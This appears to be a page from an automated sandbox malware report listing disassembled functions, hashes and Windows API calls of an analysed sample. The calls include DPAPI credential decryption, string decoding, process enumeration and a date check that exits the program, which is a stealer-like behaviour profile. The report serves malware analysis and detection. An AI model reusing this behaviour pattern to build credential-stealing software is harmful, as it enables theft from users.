                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: J,;O$Ncm$_Ue$gZ^$kY{$o<\
                                      • API String ID: 0-2485871579
                                      • Opcode ID: ea5d7b61bb354fb4850f3800746bdecc3b219c341f6b99828a2346294735fd94
                                      • Instruction ID: a79f3f7b3cfffe0c21ae1b447ba14df45c0dc1f74dc2ac0fee3513f2fcd5847f
                                      • Opcode Fuzzy Hash: ea5d7b61bb354fb4850f3800746bdecc3b219c341f6b99828a2346294735fd94
                                      • Instruction Fuzzy Hash: 68B228F360C2049FE304AE2DEC8567ABBE5EF94720F1A493DE6C5C7744EA3198058697
                                      Function 0136FFCF Relevance: 9.1, Strings: 6, Instructions: 1557COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: &)/u$/Mlo$3_U$@tl$Coo$QL>
                                      • API String ID: 0-3412162994
                                      • Opcode ID: 8c6393fe94f454f34e04b61f687fc127749feda78ae12512c2297c60823ffb98
                                      • Instruction ID: 6a8bd7513d6909073c313e9f6e2725b115f3ec7fbeb99fc047f3e050eaf86711
                                      • Opcode Fuzzy Hash: 8c6393fe94f454f34e04b61f687fc127749feda78ae12512c2297c60823ffb98
                                      • Instruction Fuzzy Hash: 18A2E7F360C204AFE304AE29EC8567AFBE9EFD4720F16893DE6C4C3744E63558458696
                                      Function 013693DD Relevance: 7.7, Strings: 5, Instructions: 1474COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: C,_\$NUrv$[3k3$wA$|s
                                      • API String ID: 0-2675721242
                                      • Opcode ID: 9fae35271fdc83493eb89ecd55113ffe963530dc0972c6eec3128c3912197661
                                      • Instruction ID: 957c2f5fea5ba3c08f143e7dd63373b4a97246ff73d8f38e165207797f1c7bfb
                                      • Opcode Fuzzy Hash: 9fae35271fdc83493eb89ecd55113ffe963530dc0972c6eec3128c3912197661
                                      • Instruction Fuzzy Hash: A8A208F360C6049FE7046E29EC8577ABBE9EF94320F168A3DE6C4C3744EA3558058697
                                      Function 00F7F8D6 Relevance: 7.6, Strings: 6, Instructions: 123COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: \u$\u${${$}$}
                                      • API String ID: 0-582841131
                                      • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                      • Instruction ID: 237720a5efea53669b2d2e43b2536b1485e3fea46bce2aa1818c31fd171f65b2
                                      • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                      • Instruction Fuzzy Hash: 5C415113D19BD5C5CB058B7444A02AEBFB26FD5220F6D82ABC4DD1F782C774414AD3A5
                                      Function 00F1C920 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00F1C971
                                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00F1C97C
                                      • lstrcat.KERNEL32(?,00F30B47), ref: 00F1CA43
                                      • lstrcat.KERNEL32(?,00F30B4B), ref: 00F1CA57
                                      • lstrcat.KERNEL32(?,00F30B4E), ref: 00F1CA78
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$BinaryCryptStringlstrlen
                                      • String ID:
                                      • API String ID: 189259977-0
                                      • Opcode ID: cc1a85309a55b87d92a16f6349d89f343c45bfb7a8e21e28b2d1781cd8253e2f
                                      • Instruction ID: 19d2507124cbd3fa177ba3af33c03c974693ba1d6ff4d587cf9e540a3ecb5737
                                      • Opcode Fuzzy Hash: cc1a85309a55b87d92a16f6349d89f343c45bfb7a8e21e28b2d1781cd8253e2f
                                      • Instruction Fuzzy Hash: 09414D75D0421E9BDB24CFE0DD99BEEF7B8AF48704F1041A8E509A6280D7745A84DFD1
                                      Function 00F26BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSystemTime.KERNEL32(?), ref: 00F26C0C
                                      • sscanf.NTDLL ref: 00F26C39
                                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00F26C52
                                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00F26C60
                                      • ExitProcess.KERNEL32 ref: 00F26C7A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Time$System$File$ExitProcesssscanf
                                      • String ID:
                                      • API String ID: 2533653975-0
                                      • Opcode ID: 8a74155dabb63f4bf6da50d15586faa3f0b8c1422c14e927c6ba613d34d964af
                                      • Instruction ID: e45623ee94510a5dd8a956e155d0dfe04c587a6e188aefcdfeab35f03dedecb9
                                      • Opcode Fuzzy Hash: 8a74155dabb63f4bf6da50d15586faa3f0b8c1422c14e927c6ba613d34d964af
                                      • Instruction Fuzzy Hash: 5221EB75D04219ABCF18EFE4E8459EEB7B9BF48300F04852AE416E7254EB349648CB65
                                      Function 00F172A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00F172AD
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F172B4
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00F172E1
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00F17304
                                      • LocalFree.KERNEL32(?), ref: 00F1730E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                      • String ID:
                                      • API String ID: 2609814428-0
                                      • Opcode ID: c4e4cb25787cc22d61ecf73573aa21defa4239f466cc35c9c32d6e64ade07e18
                                      • Instruction ID: 454f9007e5901e45542404cf0f25b248ded87d724891fa33549e409ef5675838
                                      • Opcode Fuzzy Hash: c4e4cb25787cc22d61ecf73573aa21defa4239f466cc35c9c32d6e64ade07e18
                                      • Instruction Fuzzy Hash: FE015E75A44308BBEB24DFE4DC46F9E77B8AB44B00F104054FB15AF2C4CAB0AA409BA4
                                      Function 00F29790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F297AE
                                      • Process32First.KERNEL32(00F30ACE,00000128), ref: 00F297C2
                                      • Process32Next.KERNEL32(00F30ACE,00000128), ref: 00F297D7
                                      • StrCmpCA.SHLWAPI(?,00000000), ref: 00F297EC
                                      • CloseHandle.KERNEL32(00F30ACE), ref: 00F2980A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: 29c0522c521c5c87fcfbaab7dfbc18fe56c6b9589fcf76fa686cb2e50532942d
                                      • Instruction ID: 9bd2440f2ce84b5748e21b7851b1ce79ae0c20e0b0e4ac09c88b94433ddd48b8
                                      • Opcode Fuzzy Hash: 29c0522c521c5c87fcfbaab7dfbc18fe56c6b9589fcf76fa686cb2e50532942d
                                      • Instruction Fuzzy Hash: 05011E75E14219EBDB24DFE4E944BEDB7F9BB08700F144598E5099B280E7709B80DF90
                                      Function 00F34573 Relevance: 7.3, Strings: 2, Instructions: 4819COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: <7\h$huzx
                                      • API String ID: 0-2989614873
                                      • Opcode ID: fb088554cca104848bdf3783c4890dd00089d19523cd48941a37af4099f86a4c
                                      • Instruction ID: f09583392784a8361d75d56eccf231ab4b995d9187a74bce4d4e53819a7e98c7
                                      • Opcode Fuzzy Hash: fb088554cca104848bdf3783c4890dd00089d19523cd48941a37af4099f86a4c
                                      • Instruction Fuzzy Hash: C963537281EBD41ECB27CB3047B21517F66BA53A30B1D49CEC8C18B5B3C694AA16F356
                                      Function 01365D47 Relevance: 6.6, Strings: 4, Instructions: 1590COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: $i?$=ekw$AK|f$n-v/
                                      • API String ID: 0-3545731386
                                      • Opcode ID: edaa1136bbcf1298667e713cd0a2d5ad012bff24feabcc489fe235bea4dde4bd
                                      • Instruction ID: 21a68c3b504658e8ba4c53c0dc2d23971200f6b0ced23d25b9f65c07100cc334
                                      • Opcode Fuzzy Hash: edaa1136bbcf1298667e713cd0a2d5ad012bff24feabcc489fe235bea4dde4bd
                                      • Instruction Fuzzy Hash: 35B238F360C6049FE304AE2DEC4567ABBE5EFD4720F1A893DE6C4C7744EA3598018696
                                      Function 00F29030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CryptBinaryToStringA.CRYPT32(00000000,00F151D4,40000001,00000000,00000000,?,00F151D4), ref: 00F29050
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptString
                                      • String ID:
                                      • API String ID: 80407269-0
                                      • Opcode ID: c0a99669ae3b805ae48de5bc0b301a0f7b931c5103f29682bbcabdb7f46194d3
                                      • Instruction ID: cb5791eef48b14d2fbc3e1be7e45a60c68b3b2f3515992c3451ff64fa8bac7cc
                                      • Opcode Fuzzy Hash: c0a99669ae3b805ae48de5bc0b301a0f7b931c5103f29682bbcabdb7f46194d3
                                      • Instruction Fuzzy Hash: C5110A75204219FFDF04CFA4E894FAA37A9AF89310F108458F91A8B244D7B5E941ABA0
                                      Function 00F1A210 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F14F3E,00000000,00000000), ref: 00F1A23F
                                      • LocalAlloc.KERNEL32(00000040,?,?,?,00F14F3E,00000000,?), ref: 00F1A251
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F14F3E,00000000,00000000), ref: 00F1A27A
                                      • LocalFree.KERNEL32(?,?,?,?,00F14F3E,00000000,?), ref: 00F1A28F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
